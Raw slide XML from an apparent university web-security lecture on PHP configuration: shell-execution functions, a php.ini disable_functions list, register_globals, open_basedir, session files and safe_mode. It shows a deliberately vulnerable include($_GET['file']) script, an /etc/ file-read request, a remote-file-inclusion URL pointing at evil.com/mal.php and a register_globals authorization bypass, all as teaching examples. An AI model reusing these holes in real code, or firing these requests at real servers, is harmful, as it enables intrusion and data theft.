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8" autoAdjust="0"/>
    <p:restoredTop sz="88654" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="101" d="100"/>
          <a:sy n="101" d="100"/>
        </p:scale>
        <p:origin x="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file on moxie:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/lib/php5/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info.configuration.ph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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fall 2020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Backticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> execute a shell command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ls`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equivalent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shell_exec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”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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system() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>does the usual thing, there is also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exec() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and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passthru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minor variants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950"/>
            <a:ext cx="9144000" cy="10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8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just turn this stuff off?!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are usually turned off in a shared hosting environment (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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disable_functions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exec,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passthru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shell_exec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system,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proc_open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curl_exec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curl_multi_exec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parse_ini_file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show_source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06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phpinfo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have a look on razor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(); ?&gt;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modules (compiled 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interpreter use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–m </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For mod_php7 use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echo "&lt;pre&gt;";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ex_list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get_loaded_extensions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($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ex_list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as $id =&gt; $ex) {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 echo($id . ". " . $ex . "\n");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echo "&lt;/pre&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1852</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lines long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Job security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok, most of that is comments, but still</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And comments begin with ;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srsly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php.ini is in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/7.0/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_php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actually three of them now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s focus on the most relevant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> options for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security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register_globals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69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Variables don’t need to be declared/initialized in PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If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register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in PHP5 was default on in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All GET/POST parameters become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is very convenient, but dangerous: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// define $authorized = true only if user is authenticated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authenticated_user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 {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$authorized = true;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// Because we didn't first initialize $authorized as false, this might be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// defined through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register_globals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 like from GET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auth.php?authorized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if ($authorized) {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include "/highly/sensitive/data.php";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pPr lvl="1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register_globals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>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gone in PHP7 now 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Controversial decision; broke a lot of code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allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (On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include() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function in PHP is like SSIs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include(‘common.php’); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But it’s dangerous if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is user-supplied and not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>santized</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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includer.php: &lt;?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include($_GET[‘file’]) ?&gt;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GET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includer.php?file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=/etc/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If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allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is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dirty="0"/>
              <a:t>, we can do better: pass a URL containing malicious code, and it gets executed!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includer.php?file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=http://evil.com/mal.php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open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (unset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Restricts all file access of PHP scripts (both scripts and files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose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US" dirty="0"/>
              <a:t> is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/www</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can set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open_basedir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2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If, say,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/www-data/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>has data files we need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or set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open_basedir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/www/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restrict PHP to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DocumentRoot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Note that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open_basedir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/www </a:t>
            </a:r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the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would allow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/www2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(for example)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start_session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uses the “session handler” to manage sessions with the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take a look at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stateful.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on razor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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session.save_handler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files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes saved in an SQL database, sometimes on a separate server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file-based handler used to use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dirty="0"/>
              <a:t>in PHP v4 and lower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dirty="0"/>
              <a:t>is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1777</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (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drwxrwxrwt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PHP5, files are in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/lib/php5/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In PHP7, files are in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/sessions/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Dir is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root:root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1733 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drwx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wx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-wt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Files here are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www-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data:www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-data, 600</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>files contain serialized list of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$_SESSION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vars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128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PHP automatically uses a cookie called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/>
              <a:t> that has the 32-char session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>filename is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sess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_&lt;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session_id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Session IDs are like temporary passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing Session ID allows session hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This has implications in shared environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s best to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suEXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with CGI and change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session.save_path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to a separate area controlled by you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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> job won’t clean up old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_* files for you if you do this… add your own</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would you trust your site to someone who can’t spell “than”? (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sessionclean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular PHP frameworks like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> store session IDs in a database table instead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CakePHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores in app’s local dir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All rely on PHP’s “garbage collection” for cleanup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Enclose code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 ?&gt;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/* C style, multiple-line comment */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>variables start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 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US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$this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is reserved for object contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most variables have single scope, but user-defined functions have their own local scope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 = 1; /* global scope, note the (required) semicolon */ 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 test()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{ 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    echo $a; /* reference to local scope variable */ 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} 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test();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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use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global $a;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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$GLOBALS[‘a’] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to access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$a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> within function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session.referer_check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session.referer_check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moxie.cs.colorado.edu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(for example) using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ini_set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php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Of course setting this globally in php.ini makes little sense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If PHP gets a request from a browser using a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> than listed, it marks the session as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trivial to circumvent if the attacker controls headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can break some behaviors	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose browser follows a link back to your site from another place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So this option is pretty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flawed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Better to use proper session hijacking defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> checks are still common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More later when we do session attacks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(in)famous Safe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attempt to protect PHP from bad server-side programmers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used in shared hosting environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now deprecated and will disappear in PHP6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safe_mode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On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accessed must have same owner as script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an app creates a file at run-time… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> install under mod_php5 uploads files with www-data owner; my scripts can’t read them (and vice-versa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One typical solution is to make a group and put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jrblack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and www-data into this group (and do this again for every user!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most PHP developers hate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>safe_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mostly for this reason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Safe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Cannot manipulate environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, unless they have a given prefix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Say, PHP_ is ok, but LD_ is verboten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exec(), system(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dl() is disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This dynamically loads PHP modules… yeah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A long list of (constantly-changing) other stuff is disallowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP6 is dumping this mostly because it gives a false sense of security and there have always been ways around it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plus it causes a ton of headaches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Quotes (removed in PHP 5.4)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feature auto-escapes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“ ‘ \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and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by prefixing with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/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three directives: </a:t>
            </a:r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: escape the above for GET, POST and COOKIE</a:t>
            </a:r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magic_quotes_runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: escape the above for many externally-generated strings (see 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)</a:t>
            </a:r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magic_quotes_sybase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: specific to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sybase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faces of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mod_php5,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php-cgi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We’ve seen the first two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We know a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script has to output at LEAST the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/>
              <a:t> header</a:t>
            </a:r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/>
              <a:t> doesn’t do this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use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php-cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3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php-cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> changes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to wherever the script lives, gives error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in HTML-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> format, accepts GET/POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the command line, and does a few other minor things that you wouldn’t want from the command-line oriented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/>
              <a:t> command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 A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And we have yet to do the the browser-side of things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We aren’t going to get to a lot of other things, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-level attacks, network-based attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anyway, we need to cover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at a high level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PHP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Four types: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600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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TRUE/FALSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>),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3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(overflows silently converts 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),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,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variables do not need to be declared</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All variables are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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at the start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>makes a variable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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>again (free an object this way)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 is the usual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. is string concatenation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3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is liberal,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sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is strict (and ugly); analogous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3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(or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3400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>0e1234 == 0, but 0e1234 !== 0 (this has led to vulnerabilities!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
